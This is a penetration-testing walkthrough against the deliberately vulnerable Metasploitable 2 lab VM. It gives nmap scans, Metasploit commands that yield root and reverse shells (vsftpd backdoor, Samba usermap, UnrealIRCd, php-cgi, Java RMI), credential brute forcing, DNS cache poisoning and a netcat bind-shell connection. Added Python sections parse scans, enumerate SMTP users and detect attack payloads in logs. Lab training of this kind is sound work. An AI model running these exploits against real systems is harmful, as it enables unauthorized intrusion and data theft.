Metasploitable Walkthrough

Hritik ranjan
13 min read

LHOST - Attacker IP (listener host)

LPORT - Attacker Port

RHOST - Target IP(Remote host)

RPORT - Target Port


  1. First find the IP address of the Metasploitable 2 machine (target machine)
sudo netdiscover -r 192.168.190.0/24
  • sudo: Runs the command with superuser privileges, which is required to send raw ARP frames and capture the replies.

  • netdiscover: A network reconnaissance tool that detects live hosts by sending ARP requests. ARP is not routed, so it only finds hosts on the attacker's own layer-2 segment, which is exactly where the lab VMs sit.

  • -r 192.168.190.0/24:

    • -r specifies the target network range. It must be the subnet the lab VMs are actually on; the results below are on 192.168.190.0/24, so that is the range to scan.

    • 192.168.190.0/24 defines the subnet to scan. This means:

      • 192.168.190.0 is the base network address.

      • /24 indicates a subnet mask of 255.255.255.0, so hosts 192.168.190.1 to 192.168.190.254 are probed.

RESULT

192.168.190.129 is the likely target: its MAC address starts with 00:0c:29, which is a VMware OUI, so it is another VMware guest on the same virtual network (nmap confirms this below with "MAC Address: 00:0C:29:B9:45:9A (VMware)"). The attacker VM is at 192.168.190.131. Before scanning, confirm the address on the Metasploitable 2 console with ifconfig so you do not hit the wrong host.

  2. Scanning the open ports of the target machine

command

sudo nmap 192.168.190.129 -p 0-65535 -sV -sC
  • sudo: Runs nmap as root. Root lets nmap use a raw SYN scan (-sS, the default when privileged) instead of a full TCP connect scan, and some NSE scripts need raw sockets too.

  • nmap: The tool being used, short for "Network Mapper", an open-source utility for network discovery and security auditing.

  • 192.168.190.129: The target IP address to be scanned.

  • -p 0-65535: Specifies the range of ports to scan, here every possible TCP port (the shorthand -p- scans 1-65535). Without -p, nmap only scans its 1000 most common ports and would miss the high-numbered RPC services above 30000 shown below.

  • -sV: Enables version detection. Nmap probes each open port and tries to identify the service and its version; those version strings drive the exploit searches in the rest of this walkthrough.

  • -sC: Runs the default set of Nmap Scripting Engine (NSE) scripts. These gather extra information (anonymous FTP, SMB security mode, SSL certificate details) and check for some common misconfigurations.

RESULTS

The scan lists every open TCP port together with the detected version and the NSE script output:

┌──(luvranjan㉿kali)-[~]
└─$ sudo nmap 192.168.190.129 -p 0-65535 -sV -sC -oN
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 10:43 IST
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 96.67% done; ETC: 10:44 (0:00:03 remaining)
Nmap scan report for 192.168.190.129
Host is up (0.00069s latency).
Not shown: 65506 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.190.131
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
|_ssl-date: 2025-02-15T05:15:44+00:00; +7s from scanner time.
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      37933/udp   mountd
|   100005  1,2,3      46128/tcp   mountd
|   100021  1,3,4      46774/udp   nlockmgr
|   100021  1,3,4      49012/tcp   nlockmgr
|   100024  1          37319/tcp   status
|_  100024  1          53661/udp   status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login       OpenBSD or Solaris rlogind
514/tcp   open  tcpwrapped
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info:
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 9
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, ConnectWithDatabase, SupportsTransactions, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag
|   Status: Autocommit
|_  Salt: Z~/hBNA:@o4Pu~:C"!{m
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2025-02-15T05:15:44+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    VNC Authentication (2)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
| irc-info:
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN
|   uptime: 0 days, 0:46:30
|   source ident: nmap
|   source host: 1D6DEEE3.C0E92E51.FFFA6D49.IP
|_  error: Closing Link: wbkyshkjp[192.168.190.131] (Quit: wbkyshkjp)
6697/tcp  open  irc         UnrealIRCd
| irc-info:
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN
|   uptime: 0 days, 0:46:30
|   source ident: nmap
|   source host: 1D6DEEE3.C0E92E51.FFFA6D49.IP
|_  error: Closing Link: zovbkxicu[192.168.190.131] (Quit: zovbkxicu)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
37319/tcp open  status      1 (RPC #100024)
46128/tcp open  mountd      1-3 (RPC #100005)
49012/tcp open  nlockmgr    1-4 (RPC #100021)
54150/tcp open  java-rmi    GNU Classpath grmiregistry
MAC Address: 00:0C:29:B9:45:9A (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2025-02-15T00:15:35-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h15m06s, deviation: 2h30m00s, median: 6s
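The version strings in this scan are what the rest of the walkthrough feeds into Metasploit's search. As an added example (not part of the original post), here is a small Python script that parses nmap's normal (-oN) output into structured records and flags the versions this walkthrough later exploits. The excerpt it parses is constructed from the scan above, and the module names are the ones used in the sections that follow.

```python
import re
from dataclasses import dataclass

# Constructed excerpt of `nmap -sV -oN` normal output (same format as the scan
# above); NSE script lines start with "|" and are skipped by the parser.
SAMPLE_NMAP = """\
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
| ftp-syst:
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
6667/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
"""

# "<port>/<proto>  <state>  <service>  <version...>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass(frozen=True)
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_nmap(text):
    """Return one Service per port line; headers and NSE output are ignored."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name, version.strip()))
    return services


# Version fingerprints and the Metasploit module used against each one in
# this walkthrough.  The generic "3.X - 4.X" Samba banner on 139 is deliberately
# not matched: only the precise 3.0.20 string identifies the usermap bug.
KNOWN = [
    (r"^vsftpd 2\.3\.4$",            "exploit/unix/ftp/vsftpd_234_backdoor"),
    (r"^Samba smbd 3\.0\.20",        "exploit/multi/samba/usermap_script"),
    (r"^GNU Classpath grmiregistry", "exploit/multi/misc/java_rmi_server"),
    (r"^UnrealIRCd",                 "exploit/unix/irc/unreal_ircd_3281_backdoor"),
    (r"^Metasploitable root shell$", "nc <target> 1524 (no exploit needed)"),
]


def flag_services(services):
    """Map port -> module for every open service whose version matches KNOWN."""
    hits = {}
    for svc in services:
        if svc.state != "open":
            continue
        for pattern, module in KNOWN:
            if re.search(pattern, svc.version):
                hits[svc.port] = module
    return hits


if __name__ == "__main__":
    for port, module in sorted(flag_services(parse_nmap(SAMPLE_NMAP)).items()):
        print(f"{port:>5}/tcp  {module}")
```

Run it against a real scan by saving the output with -oN and reading that file into parse_nmap; anything not in KNOWN still needs a manual search in msfconsole, which is exactly what the following sections do.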
  3. Opening the Metasploit Framework on the attacker machine (Kali)

using command

msfconsole

PORT 21 FTP (vsftpd 2.3.4)

1. Backdoor

  1. In msfconsole, search for the exact service version nmap reported
search vsftpd 2.3.4

The search lists the matching exploit module. Select it either by its index in that list or, more reliably (indexes change between Metasploit versions), by its full path:

use 0

or

use exploit/unix/ftp/vsftpd_234_backdoor

After selecting the module

  2. set the target IP
set RHOSTS 192.168.190.129

then run it

run

After execution

the module logs in with a username containing the ":)" trigger string. On this backdoored vsftpd 2.3.4 build that makes the server open a root /bin/sh on TCP port 6200; the module then connects to that port and prints "Found shell" followed by "Command shell session 1 opened". That message means we are inside the target machine.

The shell runs as root, so we can create or delete files and directories anywhere on the system, e.g.

mkdir luvranjan
ls

The new directory is also visible from the Metasploitable 2 console.

2. Anonymous login

nmap's ftp-anon script already reported "Anonymous FTP login allowed (FTP code 230)", so the server can also be used without any exploit:

ftp 192.168.190.129 #(TARGET IP)

Enter:

Username: anonymous
Password: (press Enter, or any string; anonymous FTP ignores it)

Anonymous access only gives the FTP user's view of the filesystem, not root, but it is worth checking for readable or writable directories.

PORT 22 SSH (OpenSSH 4.7p1)

  1. Open msfconsole and search for ssh login modules. A list appears; choose the login scanner, not the version scanner
msfconsole
search ssh login
use 14

or, since the index depends on your Metasploit version,

use auxiliary/scanner/ssh/ssh_login

  2. set the target IP and the username and password wordlists
set RHOSTS 192.168.190.129
set USER_FILE /home/luvranjan/Desktop/ESEC/usernames.txt 
set PASS_FILE /home/luvranjan/Desktop/ESEC/passwords.txt

RHOSTS specifies the remote target's IP address (in this case, 192.168.190.129).

usernames.txt → Contains a list of usernames.

passwords.txt → Contains a list of passwords. The module tries every username against every password, so keep both lists short against a real target; the lab has no lockout.

  3. Execute the module
run

It starts the brute-force attack and, once a pair succeeds, prints the working username and password (Metasploitable 2's documented default login is msfadmin / msfadmin, so make sure it is in your lists).

With that username and password we can log in over SSH and access every file or directory that user can read. Note that OpenSSH 4.7 only offers host-key and key-exchange algorithms that current OpenSSH clients disable by default; if ssh refuses with "no matching host key type found" or "no matching key exchange method found", allow them for this host only, e.g. with -oHostKeyAlgorithms=+ssh-rsa and, if still refused, -oKexAlgorithms=+diffie-hellman-group1-sha1.

When I tried to log in I got this kind of error:

If the correct username/password pair is not present in the lists, the module finishes with no credentials found.

PORT 23 TELNET

  1. Open msfconsole and search for telnet login modules. A list appears; choose the login scanner
msfconsole
search telnet login  #check for the telnet_login scanner
use 5

or, by full path,

use auxiliary/scanner/telnet/telnet_login

  2. set the target IP and the username and password wordlists
set RHOSTS 192.168.190.129
set USER_FILE /home/luvranjan/Desktop/ESEC/usernames.txt
set PASS_FILE /home/luvranjan/Desktop/ESEC/passwords.txt

RHOSTS specifies the remote target's IP address (in this case, 192.168.190.129).

usernames.txt → Contains a list of usernames.

passwords.txt → Contains a list of passwords.

  3. Execute the module
run

After trying every username/password combination it reports the ones that worked.

If the correct pair is not in the lists, the module ends with no credentials found.

Brute force is overkill here: connecting with telnet 192.168.190.129 shows the Metasploitable 2 pre-login banner, which literally tells you to log in with msfadmin/msfadmin. Telnet sends those credentials, and everything typed afterwards, in cleartext on the wire.

With the recovered credentials the attacker logs in to the target and can access every file or directory that user can read.

PORT 25 SMTP (Postfix)

  1. Enumeration of users

  The smtp_enum module asks the mail server whether each name in a candidate list is a real account, using the VRFY command (falling back to EXPN and RCPT TO). Postfix here advertises VRFY in its EHLO reply, as the nmap smtp-commands output shows, so it will answer.

  2. Commands
msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 > set RHOSTS 192.168.190.129
msf6 > set THREADS 10
msf6 > run  #or exploit

After it finishes the module lists every account name the server confirmed (a 250 or 252 reply to VRFY).

  3. Verifying users

Any reported name can be re-checked by hand: connect to port 25, send EHLO, then VRFY <name>; a 252 reply means the account exists, 550 means it does not.
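What smtp_enum does under the hood is a loop of VRFY commands and a look at the reply codes. The following is an added example, not code from the original post or from Metasploit: a minimal VRFY enumerator plus a constructed stand-in for Metasploitable 2's Postfix so the file runs offline. The candidate names are made up for the demonstration, and the 252/550 replies mirror what Postfix returns when VRFY is enabled.

```python
import socket
import socketserver
import threading

# Constructed candidate list: accounts Metasploitable 2 is known to have, plus decoys.
CANDIDATES = ["root", "msfadmin", "postgres", "alice", "backup_admin"]


def _reply(f):
    """Read one SMTP reply, following "250-" continuation lines; return (code, lines)."""
    lines = []
    while True:
        line = f.readline().decode(errors="replace").rstrip("\r\n")
        if not line:
            raise ConnectionError("server closed the connection")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return int(line[:3]), lines


def smtp_vrfy_enum(host, port, candidates, helo="kali", timeout=5.0):
    """Return the candidates the server confirms as local mailboxes.

    250 and 252 ("cannot VRFY, but will accept message") count as hits,
    550 is "user unknown", and 502 means VRFY is disabled, so we stop.
    """
    found = []
    with socket.create_connection((host, port), timeout=timeout) as s, s.makefile("rb") as f:
        code, _ = _reply(f)                          # 220 banner
        if code != 220:
            raise ConnectionError(f"unexpected banner code {code}")
        s.sendall(f"EHLO {helo}\r\n".encode())
        _reply(f)                                    # capability list (VRFY is listed here)
        for user in candidates:
            s.sendall(f"VRFY {user}\r\n".encode())
            code, _ = _reply(f)
            if code == 502:                          # VRFY disabled; smtp_enum would
                break                                # fall back to EXPN / RCPT TO
            if code in (250, 252):
                found.append(user)
        s.sendall(b"QUIT\r\n")
        _reply(f)                                    # 221 Bye
    return found


class _FakePostfix(socketserver.StreamRequestHandler):
    """Constructed stand-in answering like Metasploitable 2's Postfix (VRFY enabled)."""
    LOCAL_USERS = {"root", "msfadmin", "postgres"}

    def handle(self):
        self.wfile.write(b"220 metasploitable.localdomain ESMTP Postfix (Ubuntu)\r\n")
        while True:
            line = self.rfile.readline().decode(errors="replace").strip()
            if not line:
                return                               # client hung up
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb == "EHLO":
                self.wfile.write(b"250-metasploitable.localdomain\r\n"
                                 b"250-PIPELINING\r\n250-VRFY\r\n250 8BITMIME\r\n")
            elif verb == "VRFY" and arg in self.LOCAL_USERS:
                self.wfile.write(f"252 2.0.0 {arg}\r\n".encode())
            elif verb == "VRFY":
                self.wfile.write(f"550 5.1.1 <{arg}>: Recipient address rejected: "
                                 f"User unknown in local recipient table\r\n".encode())
            elif verb == "QUIT":
                self.wfile.write(b"221 2.0.0 Bye\r\n")
                return
            else:
                self.wfile.write(b"502 5.5.2 Error: command not recognized\r\n")


def demo():
    """Run the enumerator against the stand-in on an ephemeral localhost port."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), _FakePostfix)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return smtp_vrfy_enum("127.0.0.1", srv.server_address[1], CANDIDATES)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())   # ['root', 'msfadmin', 'postgres']
```

Against the real target, call smtp_vrfy_enum("192.168.190.129", 25, CANDIDATES) with a proper username list; the only thing the stand-in changes is the address. A hardened Postfix sets disable_vrfy_command = yes, in which case the 502 branch fires and the enumerator stops after the first name.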

PORT 53 DNS (ISC BIND 9.4.2)

💡 Exploit available: bailiwicked_domain.rb (DNS cache poisoning, the Kaminsky "bailiwick" attack). BIND 9.4.2 predates the 9.4.2-P1 fix that randomised query source ports, so its outgoing queries are guessable.

  1. Find the module
search bailiwicked
#two modules appear; select the domain attack
use 0 
#or 
use auxiliary/spoof/dns/bailiwicked_domain

  2. set the IP of the target resolver and the domain you want to poison
set RHOSTS 192.168.190.129
set DOMAIN google.com #any domain
set NS ns.luvranjan.com
set NEWDNS 8.8.8.8
set SRCPORT 0
check
run
  • RHOSTS → Target DNS server (Metasploitable 2). The attack only works if that server performs recursive lookups for us.

  • DOMAIN → Domain whose delegation we want to poison in the target's cache (e.g., google.com).

  • NS → Fake nameserver name controlled by the attacker (ns.luvranjan.com).

  • NEWDNS → The replacement nameserver the target will use for DOMAIN after poisoning. In a real attack this must be a server the attacker controls; 8.8.8.8 here only demonstrates that the cache entry changed.

  • SRCPORT → The source port the target uses for its outgoing queries; 0 tells the module to discover it first. A fixed, predictable port is what makes guessing feasible.

  • check → Sends the target a few queries and examines whether its source port and transaction IDs are predictable, i.e. whether it is vulnerable.

  • run → Executes the DNS cache poisoning attack: it triggers lookups of random names under DOMAIN and floods spoofed answers carrying a forged NS record until one transaction ID matches.

Results

PORT 80 HTTP

Port 80 is used for HTTP traffic, a popular entry point for attackers to exploit web servers, web apps, and CMS platforms. Let's break this down with some practical Metasploit exploits.

PHP-CGI Argument Injection (CVE-2012-1823)

  • Vulnerability: when PHP runs as a CGI binary and the query string contains no unencoded "=", the web server passes the query string to php-cgi as command-line arguments. Options such as -s (show source) and -d (set an ini directive) are then honoured, and -d auto_prepend_file=php://input turns the POST body into executed PHP, giving arbitrary command execution on the Apache/PHP server.
msfconsole
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.190.129
set TARGETURI /
set LHOST 192.168.190.131
set LPORT 4444
exploit
  1. msfconsole → Opens the Metasploit Framework console.

  2. use exploit/multi/http/php_cgi_arg_injection → Selects the PHP-CGI argument injection exploit module. It targets PHP-CGI installations affected by CVE-2012-1823 and yields remote code execution (RCE).

  3. set RHOSTS 192.168.190.129 → Specifies the target server (Metasploitable 2 in this case).

  4. set TARGETURI / → Defines the path of a PHP page to attack; the web root works because Metasploitable 2's index page is PHP.

  5. set LHOST 192.168.190.131 → Sets the attacker's IP, where the reverse shell will connect back.

  6. set LPORT 4444 → Sets the port for the reverse shell listener.

  7. exploit → Launches the exploit and, if the target is vulnerable, opens a reverse shell running as the web server user (www-data), not root.

Once an attacker has this foothold, what can they do?

  • File System Access:

    • Upload/download files, modify web pages (defacement), or inject malicious scripts.
  • Database Exfiltration:

    • Access MySQL/PostgreSQL databases, steal sensitive information like usernames, passwords, and credit card details.
  • Privilege Escalation:

    • Use local kernel exploits to gain root access.
  • Web Shell:

    • Install a PHP backdoor for persistent access (e.g., Weevely or Pentestmonkey PHP shells).
  • Pivoting:

    • Use the compromised server as a launchpad to attack other systems on the internal network.
  • Service Disruption:

    • Delete or modify critical files, rendering the website or application non-functional.
  2. Shellshock Exploit (CVE-2014-6271)
  • Vulnerability: Bash environment injection through CGI scripts. Apache copies request headers (User-Agent, Referer, ...) into the environment of a CGI process; a vulnerable bash executes whatever follows a "() { :;};" function definition in such a variable. It only works if a CGI script that is written in bash, or invokes bash, exists at TARGETURI.
msfconsole
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 192.168.190.129
set TARGETURI /cgi-bin/test.cgi
set LHOST 192.168.190.131
set LPORT 4444
exploit

No session created. Metasploitable 2's Apache ships no /cgi-bin/test.cgi, so there is nothing for the header injection to reach; the module needs a real bash-backed CGI path to succeed.
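Both modules above leave distinctive traces in the web server's access log. As an added example (not from the original post), the following Python detects the php-cgi argument-injection pattern, a query string with no literal "=" whose "+"-separated tokens start with "-", which is exactly the CGI rule the bug abuses, and the Shellshock function-definition prefix in the logged User-Agent or Referer. The log lines are constructed to resemble what the two modules send; they were not captured from a real server.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines: two php-cgi injection requests, one
# Shellshock probe, and two benign requests (one with "-s" as a normal value).
SAMPLE_LOG = """\
192.168.190.131 - - [15/Feb/2025:10:50:01 +0530] "POST /index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.190.131 - - [15/Feb/2025:10:50:02 +0530] "GET /index.php?-s HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.190.131 - - [15/Feb/2025:10:51:10 +0530] "GET /cgi-bin/test.cgi HTTP/1.1" 404 289 "-" "() { :;}; /bin/bash -c 'id'"
192.168.190.50 - - [15/Feb/2025:10:52:00 +0530] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.190.50 - - [15/Feb/2025:10:52:05 +0530] "GET /search.php?q=-s HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SHELLSHOCK = re.compile(r"\(\s*\)\s*\{")   # the "() {" function-definition prefix


def php_cgi_argv_injection(target):
    """True when the query string would reach php-cgi as command-line arguments.

    Per the CGI spec a query string containing no unencoded "=" is split on "+"
    and passed as argv; CVE-2012-1823 is php-cgi honouring options such as -s or
    -d in that argv.  Attackers therefore encode "=" as %3d, so decode each token
    before looking at it but test for the literal "=" on the raw query.
    """
    _, _, query = target.partition("?")
    if not query or "=" in query:
        return False
    return any(unquote(tok).startswith("-") for tok in query.split("+"))


def classify(line):
    """Return (ip, target, tag) for a hostile line, or None for benign/unparsable."""
    m = COMBINED.match(line)
    if not m:
        return None
    if php_cgi_argv_injection(m["target"]):
        return m["ip"], m["target"], "CVE-2012-1823 php-cgi argv injection"
    if SHELLSHOCK.search(m["ua"]) or SHELLSHOCK.search(m["referer"]):
        return m["ip"], m["target"], "CVE-2014-6271 Shellshock in request header"
    return None


def scan_log(text):
    """Classify every line of a combined-format log and keep only the hits."""
    return [hit for hit in (classify(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, target, tag in scan_log(SAMPLE_LOG):
        print(f"{ip}  {tag}  {target}")
```

Only User-Agent and Referer are visible in the combined format, so a Shellshock payload sent in Cookie or Host is invisible here and needs the raw request (mod_security, an IDS, or a full-header log format). The php-cgi rule is precise rather than a blacklist: a normal "?q=-s" is not flagged because it contains a literal "=".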

PORT - 111/tcp rpcbind

No shell comes from rpcbind itself; it is an enumeration target. The rpcinfo output above already revealed NFS (program 100003) and mountd (100005) with their ports, which is what the port 2049 section below relies on. Meterpreter access was not obtained here.

PORT - 139/tcp

NetBIOS Session Service

  • Service: Used for Windows file/printer sharing (SMB over NetBIOS).

  • Risk: Can expose file shares, user accounts, and be leveraged for remote code execution or lateral movement.

Samba Usermap Script Exploit (CVE-2007-2447)

Samba 3.0.20 through 3.0.25rc3 with the "username map script" option configured passes the supplied username into that shell command without escaping, so a username containing shell metacharacters executes commands as the smbd user, which is root.

Metasploit Commands:

msfconsole
use exploit/multi/samba/usermap_script       # Load the Samba usermap exploit
set RHOSTS 192.168.190.129                   # Target IP
run                                          # Launch the exploit

Result

We get a root shell, so we can do anything on the system.

  1. SMB Brute-Force (Using Metasploit)
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.190.129
set USER_FILE /home/luvranjan/Desktop/ESEC/usernames.txt
set PASS_FILE /home/luvranjan/Desktop/ESEC/passwords.txt
run

Result

Failed: Samba accepted none of the username/password pairs in the lists.

PORT 445/tcp SMB (Server Message Block)

Samba Usermap Script Exploit

The same smbd listens on 445 (SMB directly over TCP) as on 139 (SMB over NetBIOS), so the same exploit works; 445 is the module's default RPORT.

Metasploit Commands:

msfconsole
use exploit/multi/samba/usermap_script       # Load the Samba usermap exploit
set RHOSTS 192.168.190.129                   # Target IP
set RPORT 445                                # Target Port (the default)
run                                          # Launch the exploit

Result

Again a root shell, with full control of the system.

PORT 6667 IRC (Internet Relay Chat, UnrealIRCd 3.2.8.1)

The UnrealIRCd 3.2.8.1 source archive distributed from the project's mirrors in 2009-2010 had a backdoor added to it (CVE-2010-2075): any line received that starts with "AB;" is passed to the system shell by the ircd.

  1. search irc

  The relevant result is exploit/unix/irc/unreal_ircd_3281_backdoor.

  2. Select that backdoor module with use.

  3. Set the target IP with set RHOSTS, and choose a payload: the module only offers cmd/unix payloads, so pick a reverse one and set LHOST to the attacker's IP.

  4. After run, the attacker gets a shell with the privileges of the ircd process, which on Metasploitable 2 is root.

PORT 512/tcp open exec netkit-rsh rexecd

513/tcp open login OpenBSD or Solaris rlogind

514/tcp open tcpwrapped

  • Service: The Berkeley r-services (rexec, rlogin, rsh) allow remote command execution and logins on Unix/Linux systems.

  • Risk: Extremely high. Authentication is either cleartext or host-based via .rhosts / hosts.equiv, which trusts whatever source address and username the client claims; this enables credential theft, remote code execution (RCE), and lateral movement.

  1. rexec Login Brute Force:
msfconsole
use auxiliary/scanner/rservices/rexec_login
set RHOSTS 192.168.190.129
set USERNAME root
set PASSWORD toor
exploit

👉 Expected result: remote command execution if a weak or default password is accepted.

Here the guessed credentials were not accepted; rexec needs a real password for the account.

Using the rlogin command directly in the terminal

rlogin -l root 192.168.190.129

This succeeds without a password because /root/.rhosts on Metasploitable 2 trusts any user from any host ("+ +"), so rlogind lets us in as root. On Kali the rlogin binary comes from the rsh-client package; without it the rlogin alternative may point at ssh and fail differently. We get a root shell and create a folder named rlogin on the desktop.

Verifying this folder creation in the target machine

PORT - 1099/tcp open java-rmi GNU Classpath grmiregistry

Use Metasploit to search for RMI vulnerabilities

msfconsole
search rmi
  • This lists RMI-related modules. Look for java_rmi_server: there is an auxiliary scanner that checks for the weakness and an exploit that uses it.

  • The relevant exploit:

use exploit/multi/misc/java_rmi_server
set RHOSTS 192.168.190.129
set RPORT 1099
set LHOST 192.168.190.131
set LPORT 4444
exploit

👉 This exploit targets the RMI registry's default class-loading behaviour: with no security manager restricting it, the registry fetches and instantiates a Java class from a URL supplied by the client (an HTTP server the module starts on the attacker machine), giving remote code execution (RCE).

Got a Meterpreter session

PORT 1524/tcp open bindshell Metasploitable root shell

Root bind shell: a /bin/sh bound to TCP port 1524 that anyone can connect to, with no authentication at all (nmap even fingerprinted it as "Metasploitable root shell").

Command

msfconsole
use exploit/multi/handler
set PAYLOAD cmd/unix/bind_perl
set RHOST 192.168.190.129
set RPORT 1524
exploit

The handler does not exploit anything. Choosing a bind payload simply tells it to connect out to RHOST:RPORT and treat whatever answers as a command shell, which wraps the existing bind shell in a Metasploit session.

Result

We get a root shell directly. With it an attacker can read every file and directory and create or delete anything.

Method 2 (using netcat)

netcat (often abbreviated to nc) is a networking utility for reading from and writing to network connections using TCP or UDP. Connecting it to the port gives the same shell, no framework needed:

nc 192.168.190.129 1524

PORT - 2049/tcp open nfs 2-4 (RPC #100003)

Metasploit NFS Enumeration

msfconsole
use auxiliary/scanner/nfs/nfsmount 
set RHOSTS 192.168.190.129
set RPORT 2049
exploit

Result

